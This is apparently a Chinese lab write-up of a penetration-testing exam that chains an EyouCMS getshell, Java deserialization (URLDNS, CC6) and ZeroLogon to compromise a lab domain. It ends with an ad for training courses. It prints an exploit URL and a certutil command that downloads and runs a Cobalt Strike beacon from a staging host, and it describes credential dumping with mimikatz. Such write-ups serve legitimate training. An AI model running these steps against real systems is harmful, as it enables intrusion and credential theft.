0考核介绍
本次考核最终通过人数七人 达到预期目标
考核内容
本次考核使用在线靶靶场,主要考核从外网打点到内网域渗透的能力。
web:php代码审计 、java反序列化漏洞利用等。
内网:隧道应用、横向渗透、域渗透等 。
难度 中
拓扑图:
10x01 渗透过程
访问站点,发现是EyouCms
通过百度搜索,发现eyoucms1.5.2版本存在前台getshell
参考文章如下
https://www.cnblogs.com/1jzz/p/15489724.html
https://www.yisu.com/zixun/497673.html
利用脚本获取PHPSESSID(来自https://www.yisu.com/zixun/497673.html)
替换cookie进入后台
远程下载插件(也是取巧来自https://www.yisu.com/zixun/497673.html)
http://216.224.123.190/login.php?m=admin&c=weapp&a=downloadInstall&url=https://www.eyoucms.com/uploads/allimg/210420/1618908445631562.jpg
访问webshell
http://216.224.123.190/uploads/allimg/news_2021.php
连接蚁剑
上传哥斯拉的马,方便下一步上传大文件
通过哥斯拉执行上传的exe上线,从桌面翻到qqClient.jar,账号.txt。并从账号.txt获取到2个账号。
通过反编译jar包,发现下一个靶机信息
通过在github上搜索qqClient.jar,发现一个与源码极为相似的项目,而且同时存在server端的代码
通过审计服务端发现两处反序列化点
第一处qqserver.java中
第二处ServerConnectClientThread.java中
因为有过提示User类不是漏洞点,那就只有Message类了,去客户端寻找那些地方使用了wireObject(message)方法
随便在上面四个找了一个点,sendMessageToAll
就是在向所有人发送消息时,会触发序列化。首先利用URLDNS链来探测。
服务端取一个debug断点
客户端启动,,账户密码是被后端写死的
输入账号密码后选择向全部人发送消息触发客户端序列化
访问dnslog成功
URLDNS之后应该就是CC链了,给客户端与服务端同时添加commons-collections-3.2.1.jar作为依赖包。并生成CC链恶意对象,步骤与测试URLDNS相同。
选取CC6Gaget作为恶意对象
cc6参考文章:
https://www.yuque.com/yang99/take9g/fqaw5x
几乎可以完全复制
只需修改calc命令为你要执行的命令就行
然后根据第一台靶机QQclient.jar的反编译信息新建一个项目并添加commons-collections-3.2.1.jar作为依赖包,在sendMessageToAll中添加cc6恶意对象。
powershell上线并未成功,不过利用nc工具,确定了利用方式是正确的
利用已有的外网中转上线,创建listener
生成beacon123.exe,并放在第一台服务的web根目录下
通过远程下载(替换calc),分别执行以下命令。
certutil -urlcache -split -f http://192.168.22.152/beacon123.exe beacon123.exe
beacon123.exe
上线第一台不出网机器
后面就是域控了,首先确定域控的名字,就是AD
在第二台机器上mimikatz并没有抓到域控或者域用户的密码,
尝试CVE-2020-1472-ZeroLogon漏洞
用mimikatz进行测试,发现存在漏洞
利用mimikatz读取administratorhash
利用第二台机器开启socks代理并结合Proxifier
smbexec.exe获取adshell
最后是ad上线cs。
第一步:ad开启共享netshare
第二步:第二台机器作为中转机器生成ad.exe,并通过第二台机器ipc连接域控并上传exe
第三步:通过smbexec.exe获取的adshell执行ad.exe
至此,所有机器都上线cs了
2关注公众号
公众号长期更新安全类文章,关注公众号,以便下次轻松查阅
觉得文章对你有帮助 请转发 点赞 收藏
3关于培训
需要渗透测试培训
扫一扫添加微信咨询
课程内容点击了解